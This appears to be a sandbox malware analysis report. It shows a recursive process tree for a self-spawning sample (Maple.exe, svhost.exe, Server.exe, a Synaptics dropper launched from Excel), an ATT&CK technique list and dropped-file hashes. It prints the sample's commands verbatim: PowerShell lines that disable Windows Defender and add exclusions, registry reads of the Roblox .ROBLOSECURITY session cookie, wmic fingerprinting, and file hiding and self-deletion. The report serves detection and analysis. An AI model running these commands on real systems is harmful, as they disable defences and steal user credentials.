  - - C:\Users\Admin\AppData\Local\Temp\Maple.exe
      "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
      4⤵
      PID:352
    - - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        5⤵
        
        PID:3620
  - - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
      "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
      4⤵
      PID:3128
    - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        5⤵
        
        PID:392
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        6⤵
        
        PID:1340
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c taskkill /f /PID "5076"
        7⤵
        
        PID:3376
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /PID "5076"
        8⤵
        Kills process with taskkill
        
        PID:3632
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        
        PID:2004
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:2132
    - - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        5⤵
        
        PID:1384
    - - C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        5⤵
        
        PID:3340
      - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        6⤵
        
        PID:3768
    - - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        5⤵
        
        PID:4844
      - C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        6⤵
        
        PID:4624
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        7⤵
        
        PID:2252
      - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        6⤵
        
        PID:2224
      - C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        6⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        7⤵
        
        PID:3964
      - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        6⤵
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        7⤵
        
        PID:3436
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        8⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        7⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        7⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        8⤵
        
        PID:1016
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        7⤵
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        8⤵
        
        PID:1524
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        9⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        8⤵
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        8⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        9⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        8⤵
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        9⤵
        
        PID:4564
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        10⤵
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        9⤵
        
        PID:1936
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        9⤵
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        10⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        9⤵
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        10⤵
        
        PID:3440
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        11⤵
        
        PID:1608
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c taskkill /f /PID "2132"
        12⤵
        
        PID:2108
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /PID "2132"
        13⤵
        Kills process with taskkill
        
        PID:1968
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        12⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        10⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        10⤵
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        11⤵
        
        PID:2740
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        10⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        11⤵
        
        PID:4844
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        12⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        11⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        11⤵
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        12⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        11⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        12⤵
        
        PID:1988
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        13⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        12⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        12⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        13⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        12⤵
        
        PID:1384
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        13⤵
        
        PID:3952
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        13⤵
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        13⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        14⤵
        
        PID:2268
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:4312
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        15⤵
        Views/modifies file attributes
        
        PID:3004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:5032
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:3304
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:2896
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:1884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4412
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:4636
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe" && pause
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:276
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        13⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        14⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        14⤵
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        14⤵
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        15⤵
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        14⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        15⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        15⤵
        
        PID:3216
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        15⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        16⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        15⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        16⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        16⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        16⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        17⤵
        
        PID:4860
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        16⤵
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        17⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        17⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        17⤵
        
        PID:480
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        17⤵
        
        PID:4636

C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
"C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
1⤵
PID:2332
- C:\Users\Admin\AppData\Local\Temp\svhost.exe
  "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
  2⤵
  PID:276
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
    3⤵
    PID:964
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  PID:3920
- C:\Users\Admin\AppData\Local\Temp\Maple.exe
  "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
  2⤵
  PID:2208
- - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
    3⤵
    PID:3036
- C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
  "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
  2⤵
  PID:1176
- - C:\Users\Admin\AppData\Local\Temp\svhost.exe
    "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
    3⤵
    PID:648
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      4⤵
      PID:4844
- - C:\Users\Admin\AppData\Local\Temp\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    3⤵
    PID:1008
- - C:\Users\Admin\AppData\Local\Temp\Maple.exe
    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
    3⤵
    PID:2420
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
      4⤵
      PID:3632
- - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
    "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
    3⤵
    PID:4340
  - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      4⤵
      PID:3932
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        5⤵
        
        PID:752
  - - C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      4⤵
      PID:4136
  - - C:\Users\Admin\AppData\Local\Temp\Maple.exe
      "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
      4⤵
      PID:484
    - - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        5⤵
        
        PID:756
  - - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
      "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
      4⤵
      PID:4348
    - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        5⤵
        
        PID:5008
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        6⤵
        
        PID:4892
    - - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        5⤵
        
        PID:4884
    - - C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        5⤵
        
        PID:3964
      - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        6⤵
        
        PID:1356
    - - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        5⤵
        
        PID:4248
      - C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        6⤵
        
        PID:3320
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        7⤵
        
        PID:2968
      - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        6⤵
        
        PID:2740
      - C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        6⤵
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        7⤵
        
        PID:1660
      - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        6⤵
        
        PID:5076

C:\Users\Admin\AppData\Local\Temp\Maple.exe
"C:\Users\Admin\AppData\Local\Temp\Maple.exe"
1⤵
PID:4360
- C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
  "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
  2⤵
  PID:5000
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2332
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
    3⤵
    - Views/modifies file attributes
    PID:2420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:4832
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:3612
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4716
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1980
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1600
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2120
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2296

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\g92kdbfD.xlsm"
1⤵
PID:4920
- C:\ProgramData\Synaptics\Synaptics.exe
  C:\ProgramData\Synaptics\Synaptics.exe
  2⤵
  PID:3768
- - C:\Users\Admin\Documents\._cache_Synaptics.exe
    "C:\Users\Admin\Documents\._cache_Synaptics.exe"
    3⤵
    PID:3612
  - - C:\Users\Admin\AppData\Roaming\Server.exe
      "C:\Users\Admin\AppData\Roaming\Server.exe"
      4⤵
      PID:4292
  - - C:\Users\Admin\AppData\Roaming\conhost.exe
      "C:\Users\Admin\AppData\Roaming\conhost.exe"
      4⤵
      PID:1592

C:\Users\Admin\AppData\Roaming\Ondrive.exe
C:\Users\Admin\AppData\Roaming\Ondrive.exe
1⤵
PID:4688

C:\Users\Admin\AppData\Local\Temp\Maple.exe
"C:\Users\Admin\AppData\Local\Temp\Maple.exe"
1⤵
PID:3188
- C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
  "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
  2⤵
  PID:4360

C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
"C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
1⤵
PID:4892
- C:\Users\Admin\AppData\Local\Temp\svhost.exe
  "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
  2⤵
  PID:3328
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  PID:4388
- C:\Users\Admin\AppData\Local\Temp\Maple.exe
  "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
  2⤵
  PID:3712
- - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
    3⤵
    PID:3820
- C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
  "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
  2⤵
  PID:1288
- - C:\Users\Admin\AppData\Local\Temp\svhost.exe
    "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
    3⤵
    PID:1420
- - C:\Users\Admin\AppData\Local\Temp\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    3⤵
    PID:5076
- - C:\Users\Admin\AppData\Local\Temp\Maple.exe
    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
    3⤵
    PID:1012
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
      4⤵
      PID:1552
- - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
    "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
    3⤵
    PID:3344
  - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      4⤵
      PID:4492
  - - C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      4⤵
      PID:5092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Server.exe.log

Filesize
319B

MD5
e7df52bc2fea4cb49c9c749bd9f8d618

SHA1
fd956953e48f15d113f59be5e6a6534d32f2a25a

SHA256
65a906ff066056f5d93198115645da23ab4f880aad5d85f2fab41248b5831373

SHA512
538d0e3958b2b6a2d876e64ed70518aeba857b4effece13c930417754e2df23b612c7368bc4d8344bb9b10b721916d4ff2529cbac86142993170aa1d1918bae7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\._cache_Maple.exe.log

Filesize
1KB

MD5
b51beb4423c86427f672916554030c47

SHA1
9b97736d8434b62ef627a4ee8484e26c719924a8

SHA256
df796564c34fb36085aa25452d44ead56fba39aa18e80cb4ba1c30becca0dfea

SHA512
